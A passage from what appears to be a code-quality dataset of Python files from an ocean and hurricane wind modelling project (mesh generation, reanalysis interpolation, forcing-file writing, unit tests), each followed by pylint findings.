9 Units are km, hr, and millibars for distance, wind, and pressure respectively, and lat in decimal degrees.
10 """
11 self.siderealDay = 23.934 # A sidereal day in hrs.
12 self.omega = 2.0 * math.pi / self.siderealDay # The Earth's rotation rate in rad/hr.
13
14 self.rho = 1.15 # Air density at sea level in kg/m^3.
15 self.wind_profile_type = wind_profile_type # The particular wind profile model being used.
16
17 # Earth radius in km
18 self.earth_radius = 6371.1
19
20
21 def get_coriolis(self, lat: float) -> float:
22 """
23 Returns the Coriolis parameter for a given latitude.
24 :param lat: in radians
25 :return: coriolis factor in rad/s to be consistent with Holland's model units
26 """
27 # The Coriolis parameter = 2*omega*sin(|phi|)
28 # 3600 to convert omega in rad/s
29 return 2.0 * self.omega / 3600. * math.sin(math.fabs(lat))
30
31
32 def get_pressure_unit(self):
33 return 'millibars'
34
35
36 def get_distance_unit(self):
37 return 'kilometers'
38
39
40 def get_time_unit(self):
41 return 'hours'
| 5 - warning: unused-argument
|
1 #!/usr/bin/env python
2 '''
3 Script to map cell indices from MPASO noLI mesh to those of the wLI mesh in the runoff mapping file.
4 Start by building a runoff mapping file that has all the mesh description from wLI mapping file
5 but the actual mapping from the noLI mapping file:
6 ncks -x -v S,col,row /project/projectdirs/acme/inputdata/cpl/cpl6/map_rx1_to_oEC60to30v3wLI_smoothed.r300e600.170328.nc newfile.nc
7 ncks -A -v S,col,row /project/projectdirs/acme/inputdata/cpl/cpl6/map_rx1_to_oEC60to30v3_smoothed.r300e600.161222.nc newfile.nc
8 '''
9
10 # import modules # {{{
11 import netCDF4
12 import numpy as np
13 import argparse
14 import shutil
15 # }}}
16
17 # parser # {{{
18 parser = argparse.ArgumentParser()
19 parser.add_argument('-i', '--input_file', dest='input_file',
20 default='map_rx1_to_oEC60to30v3wLI.nc',
21 help='Input file, original runoff mapping file'
22 )
23 parser.add_argument('-o', '--output_file', dest='output_file',
24 default='map_rx1_to_oEC60to30v3wLI_final.nc',
25 help='Output file, revised runoff mapping file with no runoff below ice shelf cavities'
26 )
27 parser.add_argument('-l', '--lookup_table_file', dest='lookup_table_file',
28 default='lookup_table.txt',
29 help='lookup table file, only used locally'
30 )
31 parser.add_argument('-w', '--mesh_with_ISC', dest='mesh_with_ISC',
32 default='culled_mesh.nc',
33 help='mesh file, including ice shelf cavities'
34 )
35 parser.add_argument('-n', '--mesh_no_ISC', dest='mesh_no_ISC',
36 default='no_ISC_culled_mesh.nc',
37 help='mesh file, but without ice shelf cavities'
38 )
39
40
41 input_file = parser.parse_args().input_file
42 output_file = parser.parse_args().output_file
43 lookup_table_file = parser.parse_args().lookup_table_file
44 shutil.copy2(input_file, output_file)
45 # }}}
46
47 build_table = True
48 if build_table:
49 # noLI mesh
50 mesh_no_ISC = netCDF4.Dataset(parser.parse_args().mesh_no_ISC, 'r')
51 noLIxCell = mesh_no_ISC.variables['xCell'][:]
52 noLIyCell = mesh_no_ISC.variables['yCell'][:]
53 noLInCells = len(mesh_no_ISC.dimensions['nCells'])
54
55 # wLI mesh
56 mesh_with_ISC = netCDF4.Dataset(parser.parse_args().mesh_with_ISC, 'r')
57 wLIxCell = mesh_with_ISC.variables['xCell'][:]
58 wLIyCell = mesh_with_ISC.variables['yCell'][:]
59
60 # init lookup table
61 lookup = np.zeros((noLInCells,), dtype=np.uint32)
62
63 print("nCells=", noLInCells)
64 for i in range(noLInCells):
65 # for i in range(30):
66 if i % 1000 == 0:
67 print("Cell: ", i)
68 # find index of wLI mesh that is the same location as each cell in the
69 # noLI mesh
70 lookup[i] = np.argmin((noLIxCell[i] - wLIxCell[:])
71 ** 2 + (noLIyCell[i] - wLIyCell[:])**2)
72 mesh_no_ISC.close()
73 mesh_with_ISC.close()
74 print( "Lookup table complete.")
75 np.savetxt(lookup_table_file, lookup, fmt='%d')
76 print("Saved to ", lookup_table_file)
77 else:
78 lookup = np.loadtxt(lookup_table_file, dtype=np.uint32)
79 print("Loaded lookup table from:", lookup_table_file)
80
81 print("Lookup: first entries:", lookup[0:10])
82 print("Lookup: last entries:", lookup[-10:])
83
84 # now swap in wLI indices into the runoff mapping file
85 f = netCDF4.Dataset(output_file, "r+")
86 row = f.variables['row'][:]
87 rownew = row * 0
88 for i in range(len(row)):
89 rownew[i] = lookup[row[i] - 1] + 1 # 1-based
90 f.variables['row'][:] = rownew[:]
91 f.close()
92 print("Copied over indices.")
93
94 # vim: foldmethod=marker ai ts=4 sts=4 et sw=4 ft=python
| Clean Code: No Issues Detected
|
1 import numpy as np
2 from structures.geogrid import GeoGrid
3 from profile_model.radialprofiles import HollandWindSpeedProfile
4 from winds.parameters import Parameters
5 from winds.velocities import Velocities
6 import matplotlib.pyplot as plt
7
8 def test_velocity_grid():
9 # Grid of x, y points
10 n = 50
11 nr = 200
12 rmax = 40
13 cmin, cmax = -200 , 200
14 cellsize = (cmax-cmin)/n
15 x = np.linspace(cmin, cmax, n)
16 y = np.linspace(cmin, cmax, n)
17 U = GeoGrid(cmin,cmin,n,n,cellsize)
18 V = GeoGrid(cmin,cmin,n,n,cellsize)
19
20 params = Parameters()
21 b = 1.4
22 hc = [0,0]
23 vf = [0,10]
24 deltap = 100
25 coriol = False
26 profile = HollandWindSpeedProfile(nr,2*cmax,rmax,deltap,params.rho,params.getCoriolisMid(),b,coriolis=coriol)
27 vels = Velocities(vf[0],vf[1],profile.getVmax())
28 for j in range(0,n):
29 for i in range(0,n):
30 pt = U.getCenter(i,j)
31 r = np.sqrt(pow(pt[0]-hc[0],2)+pow(pt[1]-hc[1],2))
32 vg = profile.getValue(r)
33 vv = vels.compute_wind_vector(vg,pt[0],pt[1])
34 U.put(i,j,vv[0])
35 V.put(i,j,vv[1])
36
37 assert True # If we made it to here.
38
39 fig = plt.figure()
40
41 ax = fig.add_subplot(131)
42 ax.plot(profile.rvals, profile.profile)
43
44 ax.set(xlabel='r (km)', ylabel='wind speed (km/hr)',
45 title='Radial Wind')
46 ax1 = fig.add_subplot(133)
47
48 # Plot the streamlines.
49 # Matplotlib assume an ordinary row ordering, so the rows must be reversed before plotting.
50 Ug = U.grid
51 Vg = V.grid
52 Uplt = np.zeros([n,n])
53 Vplt = np.zeros([n,n])
54 for j in range(0,n):
55 jp = n-j-1
56 for i in range(0,n):
57 Uplt[jp,i]=Ug[j,i]
58 Vplt[jp,i]=Vg[j,i]
59
60 Vmag = np.sqrt(Ug*Ug+Vg*Vg)
61 ax1.streamplot(x, y, Uplt, Vplt, color=Vmag, cmap='Spectral')
62 ax1.set_xlabel('$x$')
63 ax1.set_ylabel('$y$')
64 ax1.set_xlim(cmin,cmax)
65 ax1.set_ylim(cmin,cmax)
66 ax1.set_aspect('equal')
67 plt.title('Wind Vectors')
68
69 plt.show()
70
| 8 - refactor: too-many-locals
|
1
2 def sign(x):
3 if(x>=0):
4 return 1
5 else:
6 return -1
7
| 3 - refactor: no-else-return
|
1 # Author: Steven Brus
2 # Date: August, 2019
3 # Description: Interpolates CFSR atmospheric reanalysis data onto the MPAS-O mesh and
4 # creates an input file to support time varying atmospheric forcing in the model
5
6 import netCDF4
7 import matplotlib.pyplot as plt
8 import numpy as np
9 import glob
10 import pprint
11 import datetime
12 import os
13 import yaml
14 import subprocess
15 import argparse
16 import cartopy
17 import cartopy.crs as ccrs
18 import cartopy.feature as cfeature
19 from scipy import interpolate
20 import write_forcing_file
21 plt.switch_backend('agg')
22 cartopy.config['pre_existing_data_dir'] = \
23 os.getenv('CARTOPY_DIR', cartopy.config.get('pre_existing_data_dir'))
24
25 ##################################################################################################
26 ##################################################################################################
27
28 def interpolate_data_to_grid(grid_file,data_file,var):
29
30 # Open files
31 data_nc = netCDF4.Dataset(data_file,'r')
32 grid_nc = netCDF4.Dataset(grid_file,'r')
33
34 # Get grid from data file
35 lon_data = data_nc.variables['lon'][:]
36 lon_data = np.append(lon_data,360.0)
37 lat_data = np.flipud(data_nc.variables['lat'][:])
38 time = data_nc.variables['time'][:]
39 nsnaps = time.size
40 nlon = lon_data.size
41 nlat = lat_data.size
42 data = np.zeros((nsnaps,nlat,nlon))
43 print(data.shape)
44
45 # Get grid from grid file
46 lon_grid = grid_nc.variables['lonCell'][:]*180.0/np.pi
47 lat_grid = grid_nc.variables['latCell'][:]*180.0/np.pi
48 grid_points = np.column_stack((lon_grid,lat_grid))
49 ncells = lon_grid.size
50 interp_data = np.zeros((nsnaps,ncells))
51 print(interp_data.shape)
52 print(np.amin(lon_grid),np.amax(lon_grid))
53 print(np.amin(lat_grid),np.amax(lat_grid))
54
55 # Interpolate timesnaps
56 for i,t in enumerate(time):
57 print('Interpolating '+var+': '+str(i))
58
59 # Get data to interpolate
60 data[i,:,0:-1] = np.flipud(data_nc.variables[var][i,:,:])
61 data[i,:,-1] = data[i,:,0]
62
63 # Interpolate data onto new grid
64 interpolator = interpolate.RegularGridInterpolator((lon_data,lat_data),data[i,:,:].T,bounds_error=False,fill_value=0.0)
65 interp_data[i,:] = interpolator(grid_points)
66
67 # Deal with time
68 ref_date = data_nc.variables['time'].getncattr('units').replace('hours since ','').replace('.0 +0:00','')
69 ref_date = datetime.datetime.strptime(ref_date,'%Y-%m-%d %H:%M:%S')
70 xtime = []
71 for t in time:
72 date = ref_date + datetime.timedelta(hours=np.float64(t))
73 xtime.append(date.strftime('%Y-%m-%d_%H:%M:%S'+45*' '))
74 xtime = np.array(xtime,'S64')
75
76 return lon_grid,lat_grid,interp_data,lon_data,lat_data,data,xtime
77
78 ##################################################################################################
79 ##################################################################################################
80
81 def plot_interp_data(lon_data,lat_data,data,lon_grid,lat_grid,interp_data,var_label,var_abrev,time):
82
83
84 # Plot data
85 fig = plt.figure()
86 levels = np.linspace(np.amin(data),np.amax(data),100)
87 ax0 = fig.add_subplot(2, 1, 1, projection=ccrs.PlateCarree())
88 cf = ax0.contourf(lon_data, lat_data, data, levels=levels,
89 transform=ccrs.PlateCarree())
90 ax0.set_extent([0, 359.9, -90, 90], crs=ccrs.PlateCarree())
91 ax0.add_feature(cfeature.LAND, zorder=100)
92 ax0.add_feature(cfeature.LAKES, alpha=0.5, zorder=101)
93 ax0.add_feature(cfeature.COASTLINE, zorder=101)
94 ax0.set_title('data '+time.strip().decode())
95 cbar = fig.colorbar(cf,ax=ax0)
96 cbar.set_label(var_label)
97
98 # Plot interpolated data
99 ax1 = fig.add_subplot(2, 1, 2, projection=ccrs.PlateCarree())
100 levels = np.linspace(np.amin(interp_data),np.amax(interp_data),100)
101 cf = ax1.tricontourf(lon_grid,lat_grid,interp_data,levels=levels,
102 transform=ccrs.PlateCarree())
103 ax1.set_extent([0, 359.9, -90, 90], crs=ccrs.PlateCarree())
104 ax1.add_feature(cfeature.LAND, zorder=100)
105 ax1.add_feature(cfeature.LAKES, alpha=0.5, zorder=101)
106 ax1.add_feature(cfeature.COASTLINE, zorder=101)
107 ax1.set_title('interpolated data '+time.strip().decode())
108 cbar = fig.colorbar(cf,ax=ax1)
109 cbar.set_label(var_label)
110
111 # Save figure
112 fig.tight_layout()
113 fig.savefig(var_abrev+'_'+str(i).zfill(4)+'.png',box_inches='tight')
114 plt.close()
115
116 ##################################################################################################
117 ##################################################################################################
118
119 if __name__ == '__main__':
120
121 parser = argparse.ArgumentParser()
122 parser.add_argument('--plot',action='store_true')
123 args = parser.parse_args()
124
125 nplot = 10
126
127 # Files to interpolate to/from
128 grid_file = './mesh.nc'
129 wind_file = './wnd10m.nc'
130 pres_file = './prmsl.nc'
131 forcing_file = 'atmospheric_forcing.nc'
132
133 # Interpolation of u and v velocities
134 lon_grid,lat_grid,u_interp,lon_data,lat_data,u_data,xtime = interpolate_data_to_grid(grid_file,wind_file,'U_GRD_L103')
135 lon_grid,lat_grid,v_interp,lon_data,lat_data,v_data,xtime = interpolate_data_to_grid(grid_file,wind_file,'V_GRD_L103')
136
137 # Calculate and plot velocity magnitude
138 if args.plot:
139 for i in range(u_data.shape[0]):
140 if i % nplot == 0:
141
142 print('Plotting vel: '+str(i))
143
144 data = np.sqrt(np.square(u_data[i,:,:]) + np.square(v_data[i,:,:]))
145 interp_data = np.sqrt(np.square(u_interp[i,:]) + np.square(v_interp[i,:]))
146
147 plot_interp_data(lon_data,lat_data,data,lon_grid,lat_grid,interp_data,'velocity magnitude','vel',xtime[i])
148
149 # Interpolation of atmospheric pressure
150 lon_grid,lat_grid,p_interp,lon_data,lat_data,p_data,xtime = interpolate_data_to_grid(grid_file,pres_file,'PRMSL_L101')
151
152 # Plot atmopheric pressure
153 if args.plot:
154 for i in range(p_data.shape[0]):
155 if i % nplot == 0:
156
157 print('Plotting pres: '+str(i))
158
159 plot_interp_data(lon_data,lat_data,p_data[i,:,:],lon_grid,lat_grid,p_interp[i,:],'atmospheric pressure','pres',xtime[i])
160
161 # Write to NetCDF file
162 subprocess.call(['rm',forcing_file])
163 write_forcing_file.write_to_file(forcing_file,u_interp,'windSpeedU',xtime)
164 write_forcing_file.write_to_file(forcing_file,v_interp,'windSpeedV',xtime)
165 write_forcing_file.write_to_file(forcing_file,p_interp,'atmosPressure',xtime)
166
| 31 - warning: bad-indentation
32 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
42 - warning: bad-indentation
43 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
49 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
53 - warning: bad-indentation
56 - warning: bad-indentation
57 - warning: bad-indentation
60 - warning: bad-indentation
61 - warning: bad-indentation
64 - warning: bad-indentation
65 - warning: bad-indentation
68 - warning: bad-indentation
69 - warning: bad-indentation
70 - warning: bad-indentation
71 - warning: bad-indentation
72 - warning: bad-indentation
73 - warning: bad-indentation
74 - warning: bad-indentation
76 - warning: bad-indentation
85 - warning: bad-indentation
86 - warning: bad-indentation
87 - warning: bad-indentation
88 - warning: bad-indentation
90 - warning: bad-indentation
91 - warning: bad-indentation
92 - warning: bad-indentation
93 - warning: bad-indentation
94 - warning: bad-indentation
95 - warning: bad-indentation
96 - warning: bad-indentation
99 - warning: bad-indentation
100 - warning: bad-indentation
101 - warning: bad-indentation
103 - warning: bad-indentation
104 - warning: bad-indentation
105 - warning: bad-indentation
106 - warning: bad-indentation
107 - warning: bad-indentation
108 - warning: bad-indentation
109 - warning: bad-indentation
112 - warning: bad-indentation
113 - warning: bad-indentation
114 - warning: bad-indentation
121 - warning: bad-indentation
122 - warning: bad-indentation
123 - warning: bad-indentation
125 - warning: bad-indentation
128 - warning: bad-indentation
129 - warning: bad-indentation
130 - warning: bad-indentation
131 - warning: bad-indentation
134 - warning: bad-indentation
135 - warning: bad-indentation
138 - warning: bad-indentation
139 - warning: bad-indentation
140 - warning: bad-indentation
142 - warning: bad-indentation
144 - warning: bad-indentation
145 - warning: bad-indentation
147 - warning: bad-indentation
150 - warning: bad-indentation
153 - warning: bad-indentation
154 - warning: bad-indentation
155 - warning: bad-indentation
157 - warning: bad-indentation
159 - warning: bad-indentation
162 - warning: bad-indentation
163 - warning: bad-indentation
164 - warning: bad-indentation
165 - warning: bad-indentation
28 - refactor: too-many-locals
28 - warning: redefined-outer-name
35 - warning: redefined-outer-name
37 - warning: redefined-outer-name
42 - warning: redefined-outer-name
46 - warning: redefined-outer-name
47 - warning: redefined-outer-name
50 - warning: redefined-outer-name
56 - warning: redefined-outer-name
70 - warning: redefined-outer-name
81 - refactor: too-many-arguments
81 - refactor: too-many-positional-arguments
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
81 - warning: redefined-outer-name
113 - error: used-before-assignment
9 - warning: unused-import
10 - warning: unused-import
13 - warning: unused-import
|
1 #!/usr/bin/env python
2 """
3 This script performs the first step of initializing the global ocean. This
4 includes:
5 Step 1. Build cellWidth array as function of latitude and longitude
6 Step 2. Build mesh using JIGSAW
7 Step 3. Convert triangles from jigsaw format to netcdf
8 Step 4. Convert from triangles to MPAS mesh
9 Step 5. Create vtk file for visualization
10 """
11
12 from __future__ import absolute_import, division, print_function, \
13 unicode_literals
14
15 import subprocess
16 import os
17 import xarray
18 import argparse
19 import matplotlib.pyplot as plt
20
21 from mpas_tools.conversion import convert
22 from mpas_tools.io import write_netcdf
23
24 from jigsaw_to_MPAS.jigsaw_driver import jigsaw_driver
25 from jigsaw_to_MPAS.triangle_jigsaw_to_netcdf import jigsaw_to_netcdf
26 from jigsaw_to_MPAS.inject_bathymetry import inject_bathymetry
27 from jigsaw_to_MPAS.inject_meshDensity import inject_meshDensity
28 from jigsaw_to_MPAS.inject_preserve_floodplain import \
29 inject_preserve_floodplain
30
31 from define_base_mesh import define_base_mesh
32
33
34 def build_mesh(
35 preserve_floodplain=False,
36 floodplain_elevation=20.0,
37 do_inject_bathymetry=False,
38 geometry='sphere',
39 plot_cellWidth=True):
40
41 if geometry == 'sphere':
42 on_sphere = True
43 else:
44 on_sphere = False
45
46 print('Step 1. Build cellWidth array as function of horizontal coordinates')
47 if on_sphere:
48 cellWidth, lon, lat = define_base_mesh.cellWidthVsLatLon()
49 da = xarray.DataArray(cellWidth,
50 dims=['lat', 'lon'],
51 coords={'lat': lat, 'lon': lon},
52 name='cellWidth')
53 cw_filename = 'cellWidthVsLatLon.nc'
54 da.to_netcdf(cw_filename)
55 plot_cellWidth=True
56 if plot_cellWidth:
57 import matplotlib
58 from cartopy import config
59 import cartopy.crs as ccrs
60 matplotlib.use('Agg')
61 fig = plt.figure()
62 fig.set_size_inches(16.0, 8.0)
63 plt.clf()
64 ax = plt.axes(projection=ccrs.PlateCarree())
65 ax.set_global()
66 im = ax.imshow(cellWidth, origin='lower', transform=ccrs.PlateCarree(
67 ), extent=[-180, 180, -90, 90], cmap='jet')
68 ax.coastlines()
69 gl = ax.gridlines(
70 crs=ccrs.PlateCarree(),
71 draw_labels=True,
72 linewidth=1,
73 color='gray',
74 alpha=0.5,
75 linestyle='-')
76 gl.xlabels_top = False
77 gl.ylabels_right = False
78 plt.title('Grid cell size, km')
79 plt.colorbar(im, shrink=.60)
80 plt.savefig('cellWidthGlobal.png')
81
82 else:
83 cellWidth, x, y, geom_points, geom_edges = define_base_mesh.cellWidthVsXY()
84 da = xarray.DataArray(cellWidth,
85 dims=['y', 'x'],
86 coords={'y': y, 'x': x},
87 name='cellWidth')
88 cw_filename = 'cellWidthVsXY.nc'
89 da.to_netcdf(cw_filename)
90
91 print('Step 2. Generate mesh with JIGSAW')
92 if on_sphere:
93 jigsaw_driver(cellWidth, lon, lat)
94 else:
95 jigsaw_driver(
96 cellWidth,
97 x,
98 y,
99 on_sphere=False,
100 geom_points=geom_points,
101 geom_edges=geom_edges)
102
103 print('Step 3. Convert triangles from jigsaw format to netcdf')
104 jigsaw_to_netcdf(msh_filename='mesh-MESH.msh',
105 output_name='mesh_triangles.nc', on_sphere=on_sphere)
106
107 print('Step 4. Convert from triangles to MPAS mesh')
108 write_netcdf(convert(xarray.open_dataset('mesh_triangles.nc')),
109 'base_mesh.nc')
110
111 print('Step 5. Inject correct meshDensity variable into base mesh file')
112 inject_meshDensity(cw_filename=cw_filename,
113 mesh_filename='base_mesh.nc', on_sphere=on_sphere)
114
115 if do_inject_bathymetry:
116 print('Step 6. Injecting bathymetry')
117 inject_bathymetry(mesh_file='base_mesh.nc')
118
119 if preserve_floodplain:
120 print('Step 7. Injecting flag to preserve floodplain')
121 inject_preserve_floodplain(mesh_file='base_mesh.nc',
122 floodplain_elevation=floodplain_elevation)
123
124 print('Step 8. Create vtk file for visualization')
125 args = ['paraview_vtk_field_extractor.py',
126 '--ignore_time',
127 '-l',
128 '-d', 'maxEdges=0',
129 '-v', 'allOnCells',
130 '-f', 'base_mesh.nc',
131 '-o', 'base_mesh_vtk']
132 print("running", ' '.join(args))
133 subprocess.check_call(args, env=os.environ.copy())
134
135 print("***********************************************")
136 print("** The global mesh file is base_mesh.nc **")
137 print("***********************************************")
138
139
140 if __name__ == '__main__':
141 parser = argparse.ArgumentParser()
142 parser.add_argument('--preserve_floodplain', action='store_true')
143 parser.add_argument('--floodplain_elevation', action='store',
144 type=float, default=20.0)
145 parser.add_argument('--inject_bathymetry', action='store_true')
146 parser.add_argument('--geometry', default='sphere')
147 parser.add_argument('--plot_cellWidth', action='store_true')
148 cl_args = parser.parse_args()
149 build_mesh(cl_args.preserve_floodplain, cl_args.floodplain_elevation,
150 cl_args.inject_bathymetry, cl_args.geometry,
151 cl_args.plot_cellWidth)
| 34 - refactor: too-many-locals
41 - refactor: simplifiable-if-statement
34 - refactor: too-many-statements
58 - warning: unused-import
|
1 # Author: Steven Brus
2 # Date: April, 2020
3 # Description: This function writes time-varying forcing data to an input file for the model run.
4
5 import os
6 import numpy as np
7 import netCDF4
8
9 ##################################################################################################
10 ##################################################################################################
11
12 def write_to_file(filename,data,var,xtime):
13
14 if os.path.isfile(filename):
15 data_nc = netCDF4.Dataset(filename,'a', format='NETCDF3_64BIT_OFFSET')
16 else:
17 data_nc = netCDF4.Dataset(filename,'w', format='NETCDF3_64BIT_OFFSET')
18
19 # Find dimesions
20 ncells = data.shape[1]
21 nsnaps = data.shape[0]
22
23 # Declare dimensions
24 data_nc.createDimension('nCells',ncells)
25 data_nc.createDimension('StrLen',64)
26 data_nc.createDimension('Time',None)
27
28 # Create time variable
29 time = data_nc.createVariable('xtime','S1',('Time','StrLen'))
30 time[:,:] = netCDF4.stringtochar(xtime)
31
32 # Set variables
33 data_var = data_nc.createVariable(var,np.float64,('Time','nCells'))
34 data_var[:,:] = data[:,:]
35 data_nc.close()
36
37 ##################################################################################################
38 ##################################################################################################
| 14 - warning: bad-indentation
15 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
21 - warning: unused-variable
|
1 from winds_io import import_data
2 from winds_io import output_data
3 from structures import geogrid
4 import sys
5 import numpy as np
6 from winds import parameters
7 from winds import wind_model
8
9 def sim_hurricane():
10 # Read in the input file to check which grid we are using
11 print('Import user inputs')
12 traj_filename, grid_flag, grid_filename, ambient_pressure, holland_b_param = \
13 import_data.read_input_file('hurricane_inputs.txt')
14
15 # Read grid-specific parameters and create grid
16 print('Read-in grid')
17 grid = import_data.initialize_grid(grid_filename, grid_flag)
18
19 # Read hurricane trajectory and set hurricane parameters
20 print('Initialize hurricane trajectory data')
21 curr_hurricane = import_data.initialize_hurricane(traj_filename, ambient_pressure, holland_b_param)
22
23 # Define parameters
24 print('Define parameters')
25 params = define_params(curr_hurricane)
26
27 # Compute winds on grid
28 print('Compute winds')
29 winds = compute_winds(curr_hurricane, params, grid)
30
31 # Output results
32 print('Output results')
33 output_data.write_netcdf('out.nc', curr_hurricane, grid, winds)
34
35 def compute_winds(curr_hurricane, params, grid: geogrid):
36 ntimes = len(curr_hurricane) - 1
37 mywinds = []
38 for it in range(0, ntimes):
39 print('Time iteration %d / %d' % (it + 1, len(curr_hurricane) - 1))
40 mywinds.append(wind_model.WindModel(params, curr_hurricane[it], grid))
41
42 return mywinds
43
44 def define_params(curr_hurricane):
45 lat = []
46 for i in range(0, len(curr_hurricane)):
47 lat.append(curr_hurricane[i].center[1])
48 return parameters.Parameters(np.mean(lat))
49
50
51 if __name__ == "__main__":
52 sim_hurricane()
53
54 print('Program executed succesfully')
55 sys.exit(0)
56 # # Read in the input file to check which grid we are using
57 # traj_filename, grid_flag, grid_filename = import_data.read_input_file('hurricane_inputs.txt')
58 #
59 # # Read hurricane trajectory
60 # traj = import_data.read_json(traj_filename)
61 #
62 # # Create trajectory object
63 # curr_hurricane = initialize_hurricane(traj)
64 #
65 # # Read grid-specific parameters
66 # if grid_flag == 1:
67 # xll, yll, cellsize, numcells_lat, numcells_lon = import_data.read_raster_inputs(grid_filename)
68 # else:
69 # coord = import_data.read_netcdf(grid_filename)
70
71 # Create the grid
72
73
| Clean Code: No Issues Detected
|
1 from structures.geogrid import GeoGrid
2
3 def test_geogrid():
4 lon = -106.0
5 lat = 35
6 nlon = 8
7 nlat = 4
8 cellsize = 1.0
9 defaultValue = -1.0
10 grid = GeoGrid(lon,lat,nlon,nlat,cellsize,defaultValue = defaultValue)
11 assert grid.lon == lon
12 assert grid.lat == lat
13 assert grid.nlon == nlon
14 assert grid.nlat == nlat
15 assert grid.cellsize == cellsize
16 assert defaultValue == defaultValue
17
18 l = int(nlat/2)
19 k = int(nlon/2)
20 for j in range(0,l):
21 for i in range(0,k):
22 grid.put(i,j,1.0)
23 for i in range(k,nlon):
24 grid.put(i,j,2.0)
25 for j in range(l,nlat):
26 for i in range(0,k):
27 grid.put(i,j,3.0)
28 for i in range(k,nlon):
29 grid.put(i,j,4.0)
30
31 for j in range(0,l):
32 for i in range(0,k):
33 assert grid.getByIndex(i,j) == 1.0
34 for i in range(k,nlon):
35 assert grid.getByIndex(i,j) == 2.0
36 for j in range(l,nlat):
37 for i in range(0,k):
38 assert grid.getByIndex(i,j) == 3.0
39 for i in range(k,nlon):
40 assert grid.getByIndex(i,j) == 4.0
41
42 testcell = [3,3]
43 center = grid.getCenter(testcell[0],testcell[1])
44 centerx = lon + (testcell[0]+0.5)*cellsize
45 centery = lat + (testcell[1]+0.5)*cellsize
46 assert center[0] == centerx
47 assert center[1] == centery
48
49 index = grid.getIndex(centerx,centery)
50 assert index[0] == testcell[0]
51 assert index[1] == testcell[1]
52
53 value = grid.getByIndex(testcell[0],testcell[1])
54 testcoords = grid.getCenter(testcell[0],testcell[1])
55 valuec = grid.getByCoordinate(testcoords[0],testcoords[1])
56 assert value == valuec
57
58 origin = grid.getOrigin()
59 assert origin[0] == lon
60 assert origin[1] == lat
61
62 bounds = grid.bounds
63 assert bounds[0] == lon
64 assert bounds[1] == lon + nlon*cellsize
65 assert bounds[2] == lat
66 assert bounds[3] == lat + nlat*cellsize
67
68 assert grid.indexInside(-1,l) == False
69 assert grid.indexInside(k,l) == True
70 assert grid.indexInside(nlon,l) == False
71 assert grid.indexInside(k,-1) == False
72 assert grid.indexInside(k,l) == True
73 assert grid.indexInside(k,nlat) == False
74
75 assert grid.coordinateInside(bounds[0]+cellsize,bounds[2]+cellsize) == True
76 assert grid.coordinateInside(bounds[0]-cellsize,bounds[2]+cellsize) == False
77 assert grid.coordinateInside(bounds[0]+cellsize,bounds[2]-cellsize) == False
78
79 assert grid.coordinateInside(bounds[1]-cellsize,bounds[2]+cellsize) == True
80 assert grid.coordinateInside(bounds[1]-cellsize,bounds[2]-cellsize) == False
81 assert grid.coordinateInside(bounds[1]+cellsize,bounds[2]+cellsize) == False
82
83 assert grid.coordinateInside(bounds[0]+cellsize,bounds[3]-cellsize) == True
84 assert grid.coordinateInside(bounds[0]+cellsize,bounds[3]+cellsize) == False
85 assert grid.coordinateInside(bounds[0]-cellsize,bounds[3]+cellsize) == False
86
87 assert grid.coordinateInside(bounds[1]-cellsize,bounds[3]-cellsize) == True
88 assert grid.coordinateInside(bounds[1]-cellsize,bounds[3]+cellsize) == False
89 assert grid.coordinateInside(bounds[1]+cellsize,bounds[3]-cellsize) == False
90
91 grid.clear()
92 for j in range(0,nlat):
93 for i in range(0,nlon):
94 assert grid.getByIndex(i,j) == 0.0
95
| 3 - refactor: too-many-locals
16 - refactor: comparison-with-itself
3 - refactor: too-many-branches
3 - refactor: too-many-statements
|
1 import pytest
2 from hurricane_model.hurricane import Hurricane
3
4 def test_hurricane():
5 center = [1.0,2.0] # Position of the eye (lon,lat) in decimal degrees.
6 extent = 100.0 # The maximum extent of the hurricane in kilometers.
7 vforward = [3.0, 4.0] # Forward velocity [ve, vn] in km/hr.
8 pcentral = 200.0 # Central pressure in millibars.
9 deltap = 50.0 # Pressure difference in millibars.
10 vmax = 15.0 # The maximum gradient wind speed in km/hr.
11 b = 1.2 # The Holland parameter, conventionally in the range [0.5,2.5].
12
13 hurricane = Hurricane(center,extent)
14 hurricane.setVForward(vforward[0],vforward[1])
15 hurricane.setPCentral(pcentral)
16 hurricane.setDeltaP(deltap)
17 hurricane.setVMax(vmax)
18 hurricane.setB(b)
19
20 assert hurricane.center == center
21 assert hurricane.extent == extent
22 assert hurricane.vforward == vforward
23 assert hurricane.pcentral == pcentral
24 assert hurricane.deltap == deltap
25 assert hurricane.vmax == vmax
26 assert hurricane.b == b
| 1 - warning: unused-import
|
1 # Author: Steven Brus
2 # Date April, 2020
3 # Description:
4 # This creates a "dummy" time varying forcing file
5 # with zero wind zero atmospheric pressure perturbation
6 # for the tidal spinup run.
7 #
8 # The tidal spinup is run using this "dummy" atmospheric forcing
9 # because the time varying atmospheric forcing for the
10 # forward run requires information in the restart file.
11 # The inclusion of this additional information in the restart
12 # file is trigged by the use of time varying atmospheric forcing
13 # in the tidal spinup.
14
15 import netCDF4
16 import matplotlib.pyplot as plt
17 import numpy as np
18 import glob
19 import pprint
20 import datetime
21 import os
22 import yaml
23 import subprocess
24 import argparse
25 import write_forcing_file
26 plt.switch_backend('agg')
27
28 ##################################################################################################
29 ##################################################################################################
30
31 if __name__ == '__main__':
32
33 parser = argparse.ArgumentParser()
34 parser.add_argument('--start_time')
35 parser.add_argument('--spinup_length')
36 args = parser.parse_args()
37
38 # Files to interpolate to/from
39 grid_file = './mesh.nc'
40 forcing_file = 'spinup_atmospheric_forcing.nc'
41
42 # Setup timestamps
43 # (3 time snaps are needed because new data will be read in at the end of the simulation)
44 dtformat = '%Y-%m-%d_%H:%M:%S'
